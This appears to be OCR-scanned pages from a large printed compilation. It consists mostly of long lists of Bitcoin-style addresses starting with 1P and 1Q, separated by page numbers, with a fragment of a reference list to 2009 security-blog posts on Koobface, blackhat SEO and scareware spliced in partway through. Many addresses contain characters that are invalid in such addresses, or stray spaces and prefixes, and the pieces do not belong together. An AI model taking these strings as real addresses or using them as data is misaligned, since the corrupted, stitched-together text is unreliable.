1PQ1BwkPKoiGTENhxTwWviwdGLcZpjktW 
1Pq3THT6LQN7e1Mwdho3zk7b5tHpae4GMC 
1Pq5EeVvtWRVKrDn8T8NmhqtBBVoPj6SvL 
1PQ7VFsiMhz26sJnxDrKmmS467axtywY1K 
1PQbnoQmdbBExoyJU76MQ8VYL1ZDUQWr6z 
1PqbyuVhJ4eTyQquccrqgqxh3Coiu5DFYF 
1Pqg6ZZwQj44hxtGKHuCwxvCbwMmXR18qL 
1PqGhyqHEONykAG4aCh]vgtwxhqFn9szul 
1PQgicSdCc5yUh7DeWraWx539zSgkh52St 
1PqK2GXRWE1UhHxVwJ86d5XFQZKF7bigk1 
1PqmdmvV2Gg]J 7VXuFjz2mLefcBKNCTM2Lkz 
1PQnnAvcMG2Jh7b1GqjxVopP3bmYEb842 
1Pqno8dBW7TE5aecDAsrm3WW5x9y8Dx8DZ 
1PQnsy4jjvQpK7yNLTXxJRZiISEYL542U1C 
1PqoCKg1wPptuzVTUEAfWWdu2fQxXczShm6 
1PqoP8119YMyqEwkS1qo3Q5xoRk9mGBksj 
1PqRRMGFDUkz1Q5JnjunJFips32kKLHTQn) 
1PQugpo450fhBB4kKKM8N58RskHyvHuHc7S 
1Pqvmwuc7e2XzM6VCVWAJigaXNeZH9Lnyd 
1PqXDoWQerCSfj2ummFUV88sdFCnbzvV57 
1PQXhjFoPX2Eb6xV5b3NHUZGHt4HXQMr6e 
1PqyjsMUQXhYVZS3JWKZSEyxkfTC5o0iGTe 
1PQzuKv9hDD5jjB9o0oztxKZkKCWJSWW1WFS 
1Pr2CH78f99GYcJGyJUXM6KLZNxX394x45 
1Pr4jp2RDvam4H4dgsVaMEPePoyJQGf9gC 
1Pr4rmy 7MFNNApo5dkpNkzSnkuyipQagfaKk 
1Pr65Te696LZaGWOrF4xXYv4mXehu9HCsWu 
1Pr660pYXPMn5dsQnHYNLGcuJ7Bhpuqbze 
1PR6YB6LcmiRPBDm9PdaDrSGxHEadJHuoi 
1Pr75iVQ2NNP10CxqzFAjAKoCQuAfQGg1g 


25755 


LPR7VYXzZKik389kXrMChwAdx944CPph5KG 
1Pr7WDtKKFzenzNbgguvDi59xtHVQzS26K 
1Pr8vrsMxsbjwSAtepZoLZdnBSmb4]4mic 
1PR8XJUPqRFBuVaV3otiwR3188nEUKzxdr 
1PRasUpXAEfbW3gusPnoxy4C9CIAKNXgR6 
1PRBFMrxjkwLNnKdVcV306UHHcL4UHF]gd 
1PRCNC16yRPlqswV6sQjECv8efd6gKiHyg 
1PrcUfVCPVR4HG8QAM5BBuVjNUDH7gZovR 
1PRf3xXx1EnPLz56wTJoDujhoLTakDYuRJk 
1PRfH1Bb6YekkjEWhfxXXctqTAEAWJP6gh9 
1PRFYZKAWC7dpEGqnGCxNTVnZNz22jwzjY 
1PRhYGpAcqmiPp8DBAq6hos4xVVae2jzky 
1PrK6A98UdDCyyHjL966Vz7DKgqBujopbk 
1PrMV8UPnNGMvFeK6Npb2xyZU2uxaR4raxk 
1ProN3EE4GAHAUveZhiF 1pUf4nkgkUXETL 
1PrPJ44VZHMMxSHULQWyB25uftfxjRBBc4 
LPRPMWix36EQqkcTmt3go5iXRxB5FdNJQ3 
1PRpQVxWzs5BBBrco9Ko9MjAVSMRYvwLRR 
1PRTLCU8TGeEu42KExFuYRkij59 7xmPPQX 
1PRUWkL45393fRYgVtMkrEL7 VUWqb8DF6G 
1PRXtmYRhoDbu5UGgXT5F4VSnsRBb9BMsr 
1PrY5pd1XFoQiqrC2CPCSMXwCY3TkiINWMA 
1PrZFyYMB3DT6YdeizPF46zY686LwyFKov 
1Ps1b8YDySmKtQYuCoBnBZ9pp5mEhRmpag 
1PS5vmtVkBCd2CN609DzrP9F984CkQmF6h 
1Ps7sTfLgyUNG3rx54uxaBKc5GFjfqKkoiF 
1Ps7VKoKheZggkT49aREmxmaDzCDSS2jJ] 
1Ps9CorehiYeD19syvoGV93wAuxeTZ6Ux5 
1PsBN6nS9U6xKynmg5GxwsVD2jzWSERY6H 
1PSdRdxi2Zx2f72XaRzJWGnbJusixtilZC 
1PsgB5SkKAExGcD2hBmpzqzdHc468bBVgx 
1PSJYpbwpKvKP8uTghhdTZewYFfRYQRFON 
1PSkcDHQMThWBgqoksRrUreVPGsSfZYqD5m 
1PsKLDsKU34e5y4CKTW8q8g]j 7kKGWrK45Y 
1PSkpFMiskCF6kxe2UM3vyiERW/7KRbDHfa 
25756 


1PSKYH95CUebxTtz7 1NLCHN9DMwoiBoThj 
1PsnJ8tnDYV70QNu1VMMaYzMb7cSWm9dv5 
1Psns4LtfdsjPTtgYBiGUFFL54f9BLHYPy 
1PsPdmHmQkcm16kKHTY8jeZ6gGp6YvjsFeb 
1PspFN2EgJZZx6dWGmNeLSPFw8BqEVWWdi 
1PSPHYmMMkCunBTQvDmSugQr4d9VbhVYCbw 
1PsqAKugcGUYgjfMHPCgN9ZHLayxZzEPoT 
1PSsGEedA94v19XonMoT6PBoKddte8gfFM 
1PSUjbiqSXYRDmMWgkr8YDx77n1GobCvXwP 
1PswJiWQcNPSXiVtSRNT8SM3VkonQN9UPX 
1PswX8kqgnrCY 3jtTj 7fwSbWxX5m5Gm1XH2 
1PSYEL5RSYiY25shwJwo8U5vKvpT1RTWzS 
1PT59DoxU4SvgTRWGEE1uszwnkKL3jpgavo 
1Pt6vZmejuFxqZYch9ht1j3n8kDSihXyFo 
1PT77rCUPfnD7TULNeK6GXTCxE4mBWVpT9 
1PtbAG3SwEp1ljEq8q8fmYaB25AWNiwPcye 
1PtfHecm1ZaEV126wWRhKUVKyaH4pu6vBB 
1PtGQ3c28jJs2GPDVnNB45xwkPcSAFJ4uE 
1LPtHFvkgafTZ5tvCSgyfZNJEUGJY8bYpbT 
1PTHOKGEVyGQDHfo9tnkCw6E3Nc7ePgAL 
1PtielsgAttXtnnSdvjgLMV4NGg9ghrPe] 
1Ptpr2PLWb6hKKyJsDxeAEpk5TQ9waij1H 
1PtqPBGED3LPXBDbByKWfC2tpHXHEgKmin 
1PTT7Dtg4fEnw7hLDcF98VRtWxD8Apj65m 
LPTW4A3sdxa7FMB2ywJqtDX5XYUtvPGtbD 
1Ptw96zjNX6G13VBwXvrEYZNaemwWLr6bfj 
1PTXkgmgZuPfYsC5RjueA4iMo5mQFfzfYo 
LPtXWKrXQCNR94yubc32FDVZYjS|jWWCgtX 
1LPTZhAD22CiVQgwkZvp22rr8ZH7kKMGSH7A 
1PulUnd5bEFANB2bU7R5ks1C95uvxPqpmg 
1Pu26bwmQuXvwWaQG1Gjzm8NQmhAK5rUyU 
1PU8dUsgrbmRr4J5TYKUmmm3eDu7hGB7Ly 
1Pub4vfnfL7fGB7HsdL9OFTGbHHnUY7bDAN 
1PuB4vvU8nhK4N7LAPHsPku9m2RKU6D6hj 
1PUBxqEGeRVJvWENTk9fbt55vkwNnw3sc3 
25757 


1PUCFvRV35pFur8kC2mvuSkMg15ul1tHbis 
1PUcq2qJhUkKMD34ZAn9v5ZR5zcyQDkS8re 
1PuDfKpM9weVk6zZAkqg5c5kmn80WUfvy2q7 
1PUfh1EpQ2GNtWN7z5gKKevdu949ESuxPC 
1LPuFh2MT4JXFS6FyiIQZaNgkqWw4pzcaYQuM 
1PUFqoq1iLNzrWaQKzS1Zbdqr6vcFWwT8Xo 
LPUHb4rzzVw82vGWrTx2esTqwv34qsiLoM 
1Puj4iYNxU9iPchDy652e3KQgHzcsQ49rA 
LPUJJAP2KAFi3iDmczxX4JUvGbhseJzN4w3 
1PumbJVHAHXmYKaopYuZYH4ohzcP1YwaT)] 
LPUMSSjAa9CVnVjcP5TNhRLFp56zw4ZEeP 
1PumTajE9bBPuRdDibFNcoNc3W3F5Mych4 
LPUNQRYJkk84eNgbhbHo6D8h99rFxVR2eXx 
1PUS44SH7nQUWQNPUS5d5J3Ffg3F2gVHnYU 
1PUt9UY 7Uqy3AKBAzi96C5QRZ1ley2CyuFf 
1LPuTDKuUQmYAA2fbqMaTf7rorvEWooNNVG 
LPUTNzgaly5vCpbuzDmdDiVdmSoHEDSLoxX 
1PutRFLaf4LqeHsNAvnUtRvicDC7yaFi7g 
1LPUupEcCTej8Q9j 74sGXvESfQmJn9LwdBj 
1PuW1QdecB9zDyvSmvLcQC91bgkKqx3Pjup 
1LPUwZPMRz8vza6RAaClePCYp1lqM8CNtc5f 
1PUX7mUZzZTHfwKPZielw7m1JZz8WiJDR1IN 
1PUxVrG4QA4LnueVUXWMzBioZeMDUtKDBk 
1PuxYKwdUZZYDvEjjkeJVSAaRzmo7RjTNf 
LPuYHh8MjpMtUsQweQvfDr127jnTpjJ3KTv 
1LPUywqTv7HMrgsAau6bAW87iGW2byHYPsV 
1pUz4bDWbchBVFMHn8nxkgaUZz3q9tNSs 
1PUzdhsfZekWctTFyAd8KBPe9v4GVc3QcW 
1Puzek5KZH5pR2dPvytGUpWZ2bfmUQruhH 
1PuZfSC2eWAxGZEGMYpZDF7MUzajpa4k53 
1Pv5FYte855Ew8RDTeaghKXFipJ28DrPte 
1Pv5krTjo7SyiNF7B3BEwxzMAajHLshAxXb 
1PV7iLiVgGLiCVtAtPta4wabRtJoKugqcCm 
1PVanxbhceyGWmmRZzZmRnxZSBpTSSpCaH 
1lpVcexX7TKAocR7q4VYUNX6jokYWCN2zBn 
25758 


1PVd8SuVAAbgtD6td2p1aZZrToN2FRu6j) 
1PvDHfKQSpv5fse2dzQGmBDr]56MBKhzux 
1PvDri332T8eECAMYb2ED1e9YXjvAtthKv 
1PvdZrnNXaA13kUd48cCAXZfuGeB9Xgx8M 
1PvEgNxfVgUWPQ6u7d1xre6ylsnbzpL35 
1Pvfe8Pj TDoPVNi88eckB4TbkLPdkt3dQC 
LPvfNzWJmkZGaWQPQrTv19gV6CPYNLSKGX 
1PVgGqVfHxXesbTARMpzM89vim2m3dbhD6U 
1PvgMVoX8nTK8LrRAjW5 1potecFejhSM46 
1PviHvBYGsxQttKLBRF3rNcQxX64b8dwVDU 
1PviYKHyf84Wuh9LESgyYjxXgTatq3PS8dn 
1PVkv2gyCeKzBVHwWecjn622DXN8C6N8C3 
1PVmy3J69fVPB7UfRKHZCh1laLmaEMmPnDb 
1LPVQ8WuUNFH6xjzRJGQ5qxhXhoFIJLTtpta8 
1PVqi4XZU3SLACTZECWQbRAIiFs3pntWo6 
1PvxEHe44sZKt6gXc6k37gY6px7SApBUyu 
1PvymDu9J3HhK2WWWTbH3)xdPRtrvDsws9 
1Pw3VdUYBn5Q23iIGHEwKXhdLnBYDtCVGaE 
LPW3Z8Aq3qi8UgoZA3WvoGbkxLqpSRGRc5 
1Pw54QZ5vuzL4mHTqz16AGVCLNTV2bmr5y 
1Pw6LLV69r71BhvDbmCKCY4NnqFdePFW5h 
1PW6wA8dBwWaFbemN1tazCHUsE8nYwLMbb 
1PW9KS8T1ySvfoiS7KnwPDjQCkDi8SQDbk 
1Pw9mN2ACemrjLsB4eMH4fAAu5hn1zvyEU 
1Pw9UkqkSj88E7SgDvtPsNbfao2LXvmkHX 
1PWEDF6LBLT3MPS5PPCbzh]JptPep53qghm 
1PwFohcvxXDxMg5UADh2bGG9s55XQ1LUr 
1PWgB9CCSHXu11pr5XqjyMFaW9gH815dVX 
1PwkWZvC7MFbfz7qfajKHoSGSLNVVWHzix 
LPWQKbHSJ5QfLC5gwogHQX5NzZHgtNVXu65 
1PWRXSsvXCEEJ5VKPoTQjpJtx9KA5wx4ktF 
1PwsadYujhSRQMpp7QCedWshvbhkEMbrA3 
LPWUGWsh7ZwmUEctyQxC4ggaFo8mfR443 
1LPWUJR8iPsrkb3toUUWNC3utYPNiDgF5Lz 
1PWuKSsZBAhjYbtRTCwfcySWxfZnN27d8h 


25759 


1PWUpZjkK55Efa8ADD3Jnaai6XSBG1QP2p 
1PwvLm2M41S9N7U8E6fJSmtQSkK6ndkDHud 
1PwwmPQEKFT7ECA25t7aNhe5SKaUJxFFTW 
1PWxGVmSyAVg28vMvDH5rKAY9ZriNmkRr1 
LPWxRF5EpAuP88Dpu6éfyYPfv5rmaYPqpB7i 
LPwxWtjifli9vaXn9fXqlMn1b7boph2orM 
1PwZ5wu45 TyoKrMAFr8CviUCtfnUAHRCFi 
1PWZKcRabLELNLvZVncdpeGycFyDtpfyPD 
LPWZZyQsYNzimgmMiU17v2YDHZ4N966tiS 
1PX1bNzvoASZGyLynvPKoJh2YfTzaXwWNAv 
1PxlyRQ2VRH2VgkAm3KZ5iv6J2bijwTdND 
1px2pnCAfclsi5Zs8Dj5y5wqQ7otiNcyL 
1Px6ncMPecPqcyvY6nYu2PHyP7/Le7Jrhaq 
1PX7Bv3iCqa6t7 XEpg33MBdx7Bw3zjM4ur 
1Px8i7fiuDEw29xDNYZMHpuGLfPz3HHZ75 
1Px8M36MwkBaDx3f46npu51FfBo41Tiy1U 
1PXbA7BihW1aA4UxKTr5hHKvDutMsPe5Tz 
1PXbhX8pC2C3e91VqB67BkKUNHVWBojG7S7 
1PxChs75pUJjnaFau8sE65TfPVEW3Qx9ba 
1PXcuy5ghMZL8vt7jCGSaSxpdprhFh5Hyb 
1PXD15VeaCh9RnSJVHy3gM90qZ04xZYFG9 
1PXdDUBFX47Q92u6SZ7dmTkjhACPb5gHhd 
1PXEpjjbXbKsjJ8jkptt2X5h6jr4jJQ1Fhh 
1PxEVqQo2GiTMHGgSx7n7okedSX3Rau48W 
1PXEwoxEV9Gw6Eyy4sYJ8S2UAVMHqT5Pvn 
1PXGgT8QfcDpkh4e8QhA9ZVOMRZZNRvqHK 
1PXgtvBskyVRSN4HvfgabPYxRMXS9XAv4g 
1PxJj8iogRk8ELea4t8mobNt2LinZGZonw 
1PxkxfwkAPWmRrVHh1AEaguHjvooEF XoJE 
1PxLSjS2FHjBYqBpSSB1C9yBLvAarNuavi 
1PxnRY7rpwYJM9DLahZa3yfNJsZ1D5EYpk 
1PXo8yvLBbwSPrLbfzQ1LdruS2fd1SdHYT 
1PXP8f9Vv5782ijz4bGhhn4akLUJZVW7RAs 
1PXTYsfyC5JAWhNPD45RkgioDZ5nEPDhSC 
1PXUjsfWs8QDYJYiQrdawTu51laZZwXVaD6 
25760 


1PXVYcA6jVW15cCTV7BFB54n5gDzd76KQs 
1PXwnQhU1MgiQRcdYfRDPSMWMh9GpLbhp5 
1PXXGjvTpgmyMUGj8yvcML7kjKbTNe8rRL 
1PxxRvWGMyQEWdqiUpXX2jx1UCaEGEjsxRz 
1PxyNJFrl1QFLmrzo6lye5yyHYqLRJUQrPN 
1PXYywkWW2hMoQckFapPtj89aveWqTre53 
1PxZmHqbx6xGwVTTNORPOFXeMFVVrRaBtl 
1PxzmqbbUDKbi9SGHbCGLP2VXYwogsviQi 
1Py3xLVEnp8ePftRyV9Bx3U4hHNRYSSEwKV 
1PY4dY6qB3Uw4Sg4hMgNtyH95bGwV4rrkC 
1PY4ZZM8Vvs8SKT4RuwmeVPkfuPAdDT 7pZ 
1Py5KAuBZsSjnDSLf8re1Pm4563pn6zB5A 
1Py6wa6pUrNqcfSkgYcXPRHGE5umC3AF1p 
1PY7LTtECXshXw4F9JKxC9ON1wq2MudPAst 
LPyAKMEpZxYF7WVKuRhgEEdZx6qtilqv6ég 
1PycDQVxawCHEJFDE3D6pAAeGYW4zPwX1F 
1PyDJjjPB7Yyh8dZQP9TeJ6GyrK8djr41R 
1PyEnHv3kFcknqMMbVqG14ism18kZsi6bW 
1PYfhqC6zrSMinrLpt6fCRaArUQgzrhbyV 
1PyGdZ4q978AGQg4nxtAjmMenyLePd5bix 
1PYgtm3iuUNW5BKUWFm7VhXMqwF 64UKJDYU 
1PyJ595HgFAiheCWKMTu4qAHhgq6vxkisfp 
1LPYjiYUNYSGPkkgP1JLb9U2CETAKVmPRMr 
1PYk3BppYocUrjz8kJvFpnfVoDrégfdAN8 
1Pyk5V6CxRZWbCLC1CmWWcagrxcTpSyYbqn 
1Pykf93V8F4rYMzmZn9poYy1NcmJf1VRh4 
1PYKndAKv66yLRn783)JdRCoeyCAx1dZ1p7 
1PyknGrUZxLByWUoUoZtABMXJibh254ZKW 
1PykTnQyqVcY8DMVex81MMCsEV6yriB6xq 
1PymdRmopE2RE34tZUNpjJq3L5mzjJ6hrL4M 
1PyMPbABw8yN4fPQLDKtrLGK7tvE7ANUmb 
1PYNY8irFBH68praWpUAXwvVp8yba7EZAE 
1PYORX3RijWkGC)JjrzdfhfFVFD5tXq7ifU 
1PyPrKnY]RvKogGjDxtdNXB9StzgPGMfky 
1PyPvKT4XQcLwoCUWI9FVNVjRWrJ860Qya 


25761 


1PYR3ypi9wD4cPrTunRs28mkWCmDx4ZQyk 
1Pyrw5jqBUZB9Sr1zohPQ7Nvj3dzQZvV5F 
1PYSjotr70ci7S2KSSULFnwDjZ9UBe98ys 
1PYT9SeByrYewpfbm6rPS8sNgsfawCKQBY 
LPYUVjtP8Ge8utjZTnkvwjJn4qoXNXBo937 
1PyXtaBBSyYSRVHkpJcApSjwmLe31FGGem 
1PYyD2dXGpEEZySmXNjcGWpiZ56mgLpfBa 
1PYztn2S63XiUmPyncDVhdh6cGyJrNAkH9 
1Pz1JjBPZj83ESCx8JW84jeGjEdjJoR3nz 
1PZ26a63Zgt6u8GtKsV71V8soV9e3Kh5rt 
1Pz7o0jJgdRQTHZGU2ZMSGHxw6GoUFSd4yw 
1PZ9ONr6721rWnaEe5uiovw5KeAsY7jGJPP 
1PzZanwu2EZMNusH6UjgvC3G6xelqCfudhv 
1PZAS6SGDTAUcwk2akHdsfz76XuF4FmbKN 
1PZDhrao8CqYBnFZEk67TbPxX8MxbKjhmh 
1PzdoWdMyTFo6tMtSzSSKUxSQxUnXTPxKa 
1PZESEN1rUnT42s5pKFnfWQAx4C9DWHhdN 
1PZfuENwPSbdhr31JZiIMAPFHEQhHY28n69m 
1PZGLwPrbDBcDudnBLVGysHPGJY4tMFGqN 
1Pzj8QF3SQXKyWNtGeWnxNbqcmVPGXrmDR 
1PZjYqpLXkprd68A6J68PLVVgkQzUfP6Ms 
1PzKtef3 MwBB5JkLXSPD5HG5GwiWYf78HF 
1PzZMdrmX8dFrueguUeARmuoLcAj9d2VRyg5 
1PZmMH1QKyHvwdpeUnyKzRHnDkvuyKwoDF6 
1PznjdZPUaCrtP59ea9ieE92zbGfStaJfh 
1PZPgJbXeU9UUaeKdsPwYni7benBanL3U6 
1PzpZqzRJ4aaeNr5tuGzfWR1BZazQ80Age 
1PzqHncZSM5S1YDon51xMmZ4EWPr5jCusZ 
1PZRbVrbHb391ejHjmSeD8mn7LysjU9DV3 
1PzSfvF3etdNTjD4Bi4ycjs9xPn4d9kbjA 
1PZtQyrKMBfraTyBigK7Sk8PcsY28RZT21 
1PZVLgK93MUj6mLggMU54HxrKEgcH68kKt4 
1PzWiJgbvFYGxsEdZvZzvoRLoNT2HWxuVq 
1PzwmD2DGAT194uiUbZxDdQWhuwMGVsr2T 
1PZxuWJV70S8r7GFkhgy2CETmMRHNB5KuB6 
25762 


12. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 


. http://ddanchev. blogspot .com/2009/08/dissecting-ongoing-us-federal-forms.htm 


14 
. http://ddanchev. blogspot .com/2009/08/blackhat-seo-campaign-hijacks-us .htm 

16. 

17. 

18, 

19, 


://ddanchev. blogspot . com/2009/05/dissecting-swine-flu-black-seo-campaign.htm 
://ddanchev. blogspot . com/2009/04/massive-blackhat-seo-campaign-serving.htm 
://ddanchev. blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with. html 
://ddanchev. blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


://ddanchev. blogspot .com/2009/06/from-ukraine-with-scareware-serving.htm 
://ddanchev. blogspot .com/2009/07/from-ukraine-with-bogus-twitter.htm 
://ddanchev. blogspot . com/2009/06/fake-web-hosting-provider-front-end-to.htm 


27. http://ddanchev.blogspot.com/ 


5.9.5 Ukrainian "Fan Club" Features Malvertisement’- at 
(2009-09-14 20:04) 
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2579 


1PZy5zJ49FG7Mwh5ACMays]J9QHxmXdh6qP 
1PZZsy7GD4GiuL3NDsn7a2GoazxG5PZTp7 
1Q113ntPtng3F3Zp9iU39PaE7LkpLypZuz 
1Q139UHFbvbHixeqQfMsbuj1SX8iZ6eHEI 
1Q145Gq7fPRttb4gdqDVTQUCURq5uJUa8S 
1Q15qaYigobTvnDe7NrDT9bJMmwR85HWE2 
1Q17i9K5cRdnpK)wMgHsxK7eBWevejadBh 
1Q18cleYcqy4gBQBtdWZmDiGKszDR7]JP6F 
1Q1A7c3wFCvGhEMHe9rJsst8eH)]pkmiB3R 
1Q1bPWpLAkKxNPjgHHmXrhAQrFyzQQ4mmkm 
1Q1ctqinCED3e7HHPurbMw97kqP48E9agG 
1Q1HVZFNHutTry8aNeGnvEjWaLWHExfjiNH 
1LQIMgVTY5RhHMPC40N5MwNK1uK6khz974WP 
1Q1NMJrgD3Epph3f9i1zxSWAUipiez4N5u 
1Q1rugTpkkX4TQIJri39zjGrs3ViBoFWot 
1Q1vcSeLgdN9Ko2zKzrL5ex86MTIWWTYsAm 
1Q1xo06vkBxXeoaq3Lv4cDalsTbhNPBy7cTB 
1Q24Y8iGbHJWELjBrikCkap2A5pQFrtcQ8 
1Q24ZAsfM7yLCktAfhUzZB3UERRjvsNDH3v 
1Q26NmseLKWuNbf6éRaNwHWjNWQ7YeEAcX8 
1Q2e1ldmQ4QS4Wc8V170ChAUB1sDAEV9b9m 
1Q2G8MzdXsPMnfKZXh46ZZvbksvmWSNHa 
1Q2GJ4NYERt5Np7rgmiAdEVqnnF 2efyFHQ 
1Q2Khd6eBmilvfwD37xDY3aumed8Joq7vZ 
1Q2LMCRJDDD9I9vVVJD8M1knW3yET5cBMDLX 
1Q2NpW78WzogpAo3SGV7bu9nDHSReBuhgm 
1Q2PPRSyAUd4ndEs231kGQeem9cL8Z7qNw 
1Q2rjnkKGNxwhPG]WorPjGqEFFAIEq9x1fWw 
1Q2rvVD7bkvorDLQH2XLfqtLbr3HECmwaAjr 
1Q2zmu735ZNGstDYmtuxgzkEPCUGSHZSmt 
1Q35cKQyRP1tBtdYr6TeZpbCQGXUd2zhzd 
1Q368c5GgR2engtNn9xWqZxp5bRPCWR6Ew 
1Q36D3ZKDV1RR97Z6pwzLtX43Epd3tTzjv 
1Q3BJuu8t99i23wNF4pk8rLsKwLWWT9xvn 
1Q3DfHTEO80ANxbiFg7KgV3Xdm300W5Mx4 


25763 


1Q3ipDfmpa5YHASDBomHccgVPh4mrq3KKd 
1Q3j317pad9QsvcR79JfoeAMvz6YG1Hp9P 
1Q3MiXPLeKmreF7BtL9GB5f3FYZgXhUE3P 
1Q3MmMQ4ctGHzsacaPgVUVFLL2iJYgatD2jr 
1Q3pzDPuQq9EXrH64kCFXQc7JV71JtLhPo 
1Q3voxVjY7Hs6UrDbpdT3BzKumahBaTEt1 
1Q3Yf9WPGN9cOoMnBc3tacw9KHWYhhVBq/U 
1Q3zzrPxts9PXLaTwnJohN8sg715aYbxkj 
1Q44MHw9wmCKpj6ASpDFrYiShWHnBfo7 Mi 
1Q477sCgP4KUk7L8cHtoenhbwYvNZ4ZkuS 
1Q48rMkbHPhsnSUP81u7CodxigYwLj2x]J6 
1Q4bizZMCj1qUYxxpjPm1psAEVkcFirm1T 
1Q4bpdKXGZGoXDSYBxSZx9Yn43hDY9yVKx 
1Q4CuftQ2xih1t5K42TobWXHLMdHYLq2egB 
1Q4EwZAHhr25fZrR3ZpwsV3AwTfbYq3Zma 
1Q4fG4Fypx7a4J7jEymeTrY5XNbjJBk3ekT 
1Q4JjfTRBj1TjE7Jqxegae6eX3w3o0PLRkf 
1Q4jYTeJ26suxUHfPp56a5pe2mdkYfWw54r 
1Q4mMWkPS7XfTbnaNilsnHWUoQjECikaYPL 
1Q4PqqnHQrzxtJG3bq8NfCt8rN4TB5PoONz 
1Q4SyDKpToAhKaDayr3)JJEP7snU2VW8a]Jp 
1Q4SZTtRG6imksW3moZJHcKtlq8Ks2s6WY 
1Q4W2DaHg7WAYunf9tPknTSRWLZwWHaQG]x 
LQ4WFPGsohzQ13XSjq7zC1tiLGQBFSNmQB 
1Q59R9YhHCBdWpnj5ve4BTSi2scbmAdK3TyZ 
1q5BYsVbdifgofVxF4ejcW1kQqD9jYyVX 
1Q5GAsbzdkkiXWxBX9YfZLQWQHTUN2vVHmU 
1Q5NbuWbabMvslauwjxscdkSR21SYWnQ8S 
Lq5RUE2hHDQso84MFjxjgTih2ZxapsWg3b 
1Q62YrBicjZqetAkm9AAXDNWIAB2uiTU3K 
1Q65VSYY4nqMyAVazNBgJgqZiNALR8A8km 
1Q66CkptdKoxhAGm5cZqsTCyq/7n27xHFBz 
1Q6a6NREbnFDB2BLiILRFVSReSnbKT9SRRX 
1Q6bPaxXvekG5VletCyVdNFgMSGAK3FK8FY 
1Q6EEAjDsQGTX4vnwfaRy2katadfSvEoQ6 
25764 


1Q6f76Sj6pRZkJuWssizSUec5HtoDQsgao 
1Q6GgstXPJUCyEDuMps1pxpipRzeVnfW9C 
1LQ6HR3SOMBUJpvQqMrénktp7S1Kw7LjWxB 
1Q6rJyfiqTi7FtBh6CqqArvHRbCAvbWPFv 
1Q6t26bF84zZSnNZ3HFCE590EWSRKGPA4W7 
LQ6UW69NnH7P5qdMkgUpLMS7hjNxiCCfZb 
1Q6YXaBGKxxgYZuw47L4wXsobqyeoZzT1g 
1Q7ArApGSoAPSpjPg8etcdxBcXDUVEHioZ 
1Q7cgn949Ss1x4VdPBwaeQ1bKCnukw6X1X 
1Q7cxYj1pjHeqokxolckLKkJr7dHMgUAto 
1Q7EDfgu2NZeBGubGaxoxbP58SiwLAMLft 
1Q7EkKQPZ2UGnqwRa3yephs8yagqUrxoeH4 
1Q7FVzNCynm5yiDLyLqq5BsRM9HL4xjwN2 
1Q7jevviLBGMa4jG9GCTDqxX5w6yYDruqPvz 
1Q7KPbRGVxZymcSdXR8vyzh8uF5yyCTLYx 
1Q7PT2Gcx6BNSZg3GzX523CA6f8dmmfEbZ 
1Q7qKVPzaEkufK4tLNpaLqn3TxGTFwTbq8 
1Q7Qsz2z2h28tzA9EDZ3NG6r6 TwKxSbd7} 
1Q7r4JSdtXon3QcPcGnVrmuwNa3342pxi2 
1Q7RSEgiNhtPTXtKH6fWmFZwHu9SUWEFCim 
1Q7UGHTrNWEMT6PyqAFAZdzGoer48dR2Sn 
1Q7VckSj9CkrUUTWnckJCZ3NHmnALt4jF) 
1Q7VtBNFopXPyUKvprmZ2vJTYTNj1ziwg} 
1Q7YSvwkgjicsFukau2Z7X5G4RfWtLRrwo 
1Q7ZFTpMsTNkyPeuopY5ghVi2DSZsbEr6F 
1Q87berabQ880ex6Mbnm7iGkepencPWYv 
1Q87CRFPJTWdXbwnBi3huZgbCpu4whZ606 
1Q886hDm4ba4tUgEZzWnDeLaGMHYefeb2V2 
1Q8arYbih2bgkZFV9zZKpri6Qeq8yZFIGCj 
1Q8DdvwegqJKekFSp3bxpNmrox5boEgpWy 
1Q8eGbkfYBOKH3Xr75N8KKhFZMY1q94VRV 
1Q8ER4LuvVo6DEOMtxx6qYNCfXSsQigqsP]t 
1Q8GiSMopiygiENnfVMCQ1vEFb68qxPENi 
1Q8Gvh51brTdG3zkucmzBcZ3EHUtp7smd)J 
1Q8icBJEK8EDxP8UtvhTC8WEHMQFavyWGH 


25765 


1Q8LWL5ZHD6FWkNeLMKp5hoaaXXWRmuirS 
1Q8nD9dK1bG45Vb5akN3fjeSmHQdZGYTpU 
1Q8nMgiBQGQ4Y3REbhhG3KeHqwdGhk3Xwg 
1LQ8otMiSJikc1DLAjPjoox59Vrzbq27qM1 
1Q80w8tG7deK]p5hssxnW1TM2Y5MYkEvNC 
1Q8pu9noF2ZD9tNsaXAKZ1MkzbniNFWrzzm 
1Q8Q8e6KLCfFMn7PHy5ubnKUrKgQRAhD8UZ 
1Q8rVutEc2BTeBexsxXTFrlLWnD9rPUXEAkS 
1Q8vfZ2dS9jJHVZUXX8d3XeTZ5FYRC3HDYi 
LQ8WtDk5MQwWHsjsr9GtYpoM2USk5xcs]y 
1Q8yzxbpkHfdSUIEfUNHHhAZGFp31iPnuu7 
1Q8ZGPZLhbYG9XRMDT9IrYKXTZn3ZEWuC9q 
1Q94ALP2taVSp2t3iPnA74Pre2taH4Ji7Z 
1Q9axiEuVaatnk4hhBYaYtZXcgi5GAgUZW 
1Q9c4BMFGjPzgVH2yH]BAVK9rgq938vCGUX 
1Q9CAbDWL3UDeBciVxPGyBfqjwtpn6KnL6C 
1Q9CFE54FCSRXRVErjVeSv6RPQM5Fegs6X 
1Q9EXZZ1jdLrakbg3PAQ9tRnuwDcKvPmc 
1Q9gn89zZKF65g7mttSDCJqiH7Xs7T6usNX 
1Q9vyfmxDzZLSYPT325Vi4LMUV8Gi7HToTt 
1Q9wkmSwkpZsmxLgJ6he6N65G2cHJBBHj9 
1Q9xAei2Gx98xiEvVAW25dBwAJ2KrBcDLXz 
1QA3H09g5b2U31gBCQz04b5tnJVmMM8R5Kv 
1QA3udCcow9amtTrrAkn32whsBRyLqGSW8C 
LQAC8Qh9fzDzZTx8AYaPom4ppom8MVX9LKP 
1QAeKbQhunb6tp3sQNvyRF23ktLoaxxr17N 
1LQAhbK8NxEaCEA7VZAfVWG6RENwW7HKUZfE 
LQAhHESRCRMz9bb65sPvYH6yCxXtsxXdaQnor 
1QAjnNDBAMhKMexXnhpe9L9EEnS283u6g3X 
LQALH5fh2gkXqBIqWgX5VJtiNnNBYLezjqR 
LQAM8mogrFg2fTMbQzZUTWDXJznShoPxEGmT 
1QApLgQ7ASHZNhgnCcg9MRDAookRLNhqkL 
1QATitB1dpwdGGttkyWs1Qn9Hvaw2d39UD 
